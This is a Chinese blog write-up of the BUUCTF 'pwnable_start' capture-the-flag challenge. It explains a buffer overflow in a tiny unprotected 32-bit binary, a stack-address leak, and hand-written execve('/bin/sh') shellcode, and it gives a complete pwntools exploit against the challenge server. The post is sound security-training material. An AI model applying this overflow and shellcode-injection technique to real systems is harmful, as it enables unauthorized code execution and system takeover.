[BUUCTF]PWN——pwnable_start

最新推荐文章于 2024-02-04 20:12:39 发布
最新推荐文章于 2024-02-04 20:12:39 发布
阅读量1.1k 收藏 1
点赞数 3
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/110704518
版权

pwnable_start

附件

步骤:

  1. 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法
    在这里插入图片描述

  2. 本地试运行一下,看看程序大概的情况
    在这里插入图片描述

  3. 32位ida载入,没法f5,好在汇编不长,看得懂
    在这里插入图片描述

一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了

write(1,buf,0x14)
read (0,buf,0x3C)

通过最后的add esp,14h 我们可以知道esp距离ret的地址0x14个字节(内平栈),也就是我们输入的参数buf的大小只有0x14,但是我们读入了0x3c,存在溢出漏洞

  1. 就跟一开始说的,由于没有开启任何保护,所以使用ret2shellcode的方法,要往栈上写入shellcode,首先要知道栈上的地址
payload=a*0x14+p32(0x8048087)

由于使用的内平栈,没有ebp,覆盖完buf后就是ret,其实看上方的汇编就知道了。
这句payload将程序执行流转到了去执行write函数,此时esp里的值是栈上0x8048087地址里的内容,这样就把栈上的地址给泄露了出来。
在这里插入图片描述
看到我们泄露出来了的栈地址,然后看一下esp现在指向的地址,他们中间相差0xd4-0xc0=0x14,我们可以用泄露的地址+0x14来表示之后的esp

  1. 接着就是写入shellcode,我一开始使用的pwntools自动生成的shellcode,但是失败了,可能是太长了,没有全部写进去,顺便学习了一下写shellcode
    起始所谓的shellcode就是去执行execve(‘/bin/sh’,0,0)
    系统调用执行的话就是int80 (eax,ebx,ecx,edx)
    execve的系统调用号是11,所以设置eax=0xb
    ‘/bin/sh’用16进制表示一下是0x0068732f,0x6e69622f,所以ebx要设置成‘/bin/sh’
    接着ecx和edx设置成0即可
shellcode=asm(
“‘
xor ecx,ecx;     #ecx设置为0
xor edx,edx;	#edx设置为0
push edx;		#将edx的值压入栈
push 0x0068732f;
push 0x6e69622f;
mov ebx,esp;    #将ebx设置为’/bin/sh‘的16进制 
mov eax,oxb;    #eax设置为0xb,调用execve
int 0x80
"')

由于小端序的原因,所以写入/bin/sh的时候起始写的是hs/nib/
在这里插入图片描述
在这里插入图片描述

综上所述,完整exp

from pwn import *
context.log_level="debug"
#p = process('./start')
p=remote('node3.buuoj.cn',26163)
payload = 'A'*0x14 + p32(0x8048087)
p.sendafter("Let's start the CTF:",payload)
#gdb.attach(p,'b * 0x804809c')
stack_addr = u32(p.recv(4))
print 'stack_addr: '+hex(stack_addr)

#gdb.attach(p)

shellcode = asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f;mov ebx,esp;mov al,0xb;int 0x80')


payload = 'A'*0x14 + p32(stack_addr+0x14)+shellcode
p.send(payload)

p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4158
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
BUUCTF pwnable_start
BengDouLove的博客
05-01 351
程序只有这么点代码,稍微分析一下 esp入栈,返回地址入栈(这里直接返回到exit函数,就退出程序了) 清空四个寄存器 这些东西被入栈,不知道是什么,往下看 这里调用了write函数,在汇编当中调用write函数的形式和寄存器是这样的 wtite ( fd , addr , length ) 三个参数对应的寄存器为 ebx ecx edx 将esp赋值给了ecx,说明要打...
buu pwnable_start 详解
m0_74172100的博客
07-11 154
这里是不是使得 ret (返回地址)成为了新栈的内容,因此利用题目自带的write函数 将ret(返回地址)填入 p32(0x0804808),然后执行 mov ecx,esp。#使esp(栈顶)增加了0x14字节,ebp没改变,使用的内平栈,没有ebp,覆盖完buf后就是ret,从ret开始就是一个新的栈。之前加上一个push ecx 还是因为 add esp,14h ,使得 ret (返回地址)成为了新栈的内容,所以使用 push ecx ,使 esp-4 跳过 ret的地址。
pwnable_start(write up)
m0_73756460的博客
01-19 180
buu刷题 pwnable_start(write up)
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 217
BUUCTF:pwnable_start题解
pwnpwnable_start --只有read和write函数的getshell
question55的博客
02-04 896
addrlenfd'<'LINUX -
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 353
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
pwnable.tw - start
不急不躁
07-08 4137
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1526
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
BUUCTFpwnable_bf
xy1458214551的博客
01-12 381
BUUCTFpwnable_bf题解
pwn入门刷题——starting
qq_44302282的博客
05-04 1734
运行就能拿到shell呢,真的 题目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的题入手(虽然我先刷的不是这道题,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
pwnable.tw第一题start
计算机小白的博客
08-09 5556
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
最新发布
07-08
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值